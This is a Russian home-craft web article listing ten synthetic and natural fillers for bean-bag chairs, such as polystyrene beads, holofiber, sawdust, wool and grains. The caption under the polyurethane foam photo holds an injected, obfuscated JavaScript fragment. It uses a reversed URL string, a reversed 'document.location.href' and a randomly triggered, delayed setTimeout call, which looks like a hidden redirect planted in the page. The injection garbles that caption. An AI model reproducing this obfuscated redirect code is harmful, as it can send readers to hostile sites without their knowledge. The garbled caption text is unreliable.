Добавить в закладки

10 популярных наполнителей для кресла мешка

Кресло-мешок, благодаря своей неповторимой способности максимально расслаблять тело человека, становится все более знаменитым. Ранее мы уже рассказывали о том, как пошить кресло-мешок своими руками в статье «Шьем кресло-мешок за 1 вечер», а сегодня мы предлагаем рассмотреть способы его наполнить.

10 наполнителей для кресла-мешка

10 наполнителей для кресла-мешка. Фото: dekoriko.ru

Синтетические наполнители

  1. Пенополистирол считается наиболее часто используемой «начинкой» для кресла. Обусловлено это высокой упругостью материала, его легкостью. Однако, у него есть склонность к усадке после длительной эксплуатации. Шарики пенополистирола могут быть размером от 0,1 до 5 сантиметров. Чем больше шарик, тем быстрее произойдет проседание сидения.
Пенополистирол

Пенополистирол. Фото: promopuff.com.ua

  1. Полипропилен внешне похож на предыдущий материал, но считается более долговечным. При нажатии на горошину она легко приходит в первоначальную форму. Пропилен устойчив к огню, но его состав выделяет отравляющие испарения во время горения.
  2. Гипоаллергенный прочный пенополиуретан совсем недавно начал пользоваться доверием у изготовителей. Добавляют его не во все модели кресел-мешков, а только в те, что обшиваются плотной тканью, типа кожи. Внешние контуры наполнителя могут проступать и внешний вид станет непривлекательным.
Пенополиуретан

Пенополиуретан. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tories/virtuemart/product/IMG_0214.jpg»>pufik.shop

  1. Мягкий холлофайбер используется реже, хоть он абсолютно безопасен, влагоустойчив и обладает высокой способностью пропускать воздух. Чаще всего им дополняют мелкие шарики.
Холлофайбер

Холлофайбер. Фото: promopuff.com.ua

  1. Очень часто рукодельницы наполняют мешки ватой. Изделие получается мягким, легким, но быстро оседает из-за слипания ваты.

Натуральные наполнители

  1. Опилки или древесная стружка от дерева кедра, сосны считаются одним из наиболее подходящих натуральных материалов. Они не только обеспечат нужную форму креслу, но и окажут оздоровительный эффект на организм. Во время выбора стоит внимательно присмотреться к структуре, в которой не должно быть острых частиц.
Мягкие опилки

Мягкие опилки. Фото: bezkovrov.com

  1. У многих людей наблюдается аллергия на изделия из пуха, поэтому от его использования стоит воздержаться. К недостаткам пухового основания также относится способность быстро намокать, долго высушиваться. Даже после тщательной сушки у такого изделия может появится резкий неприятный запах. Плюс применения пуха заключается в легкости материала.
  2. Среди наиболее распространенных натуральных наполнителей находится овечья шерсть. Стоит она недорого, не электризуется и долго держит форму.
  3. Многие швеи задействуют для изготовления кресла-мешка сено, содержащее в себе лекарственные растения. Таким образом получается не только надежный каркас, но и происходит полезное воздействие на организм травяными ароматами.
  4. Удивительно, но рисовая, гречневая крупа, а также семена бобовых культур тоже могут быть в составе наполнителя для кресла-мешка. С их помощью можно сделать настоящее ортопедическое сидение. Такая мебель будет абсолютно безопасной, удобной, но тяжелой.

При выборе подходящего материала обязательно учитывайте объем кресла и его будущее предназначение.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 21.08.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: